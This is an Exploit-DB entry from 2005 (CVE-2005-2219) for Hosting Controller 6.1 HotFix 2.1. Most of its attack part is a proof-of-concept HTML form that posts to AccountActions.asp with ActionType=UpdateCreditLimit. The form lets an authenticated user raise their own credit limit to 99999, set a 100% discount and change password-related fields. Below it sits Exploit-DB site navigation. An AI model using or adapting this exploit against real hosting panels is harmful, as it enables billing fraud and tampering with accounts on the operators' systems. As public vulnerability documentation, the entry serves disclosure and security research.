Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit

EDB-ID:

1096

CVE:

2005-2219

EDB Verified:

Author:

Soroush Dalili

Type:

remote

Exploit: /

Platform:

Windows

Date:

2005-07-10

Vulnerable App:

Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).
Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated 
user can change his/her credit and buy some services!

Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.
Exploit code to proof:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value=""></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>

# milw0rm.com [2005-07-10]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services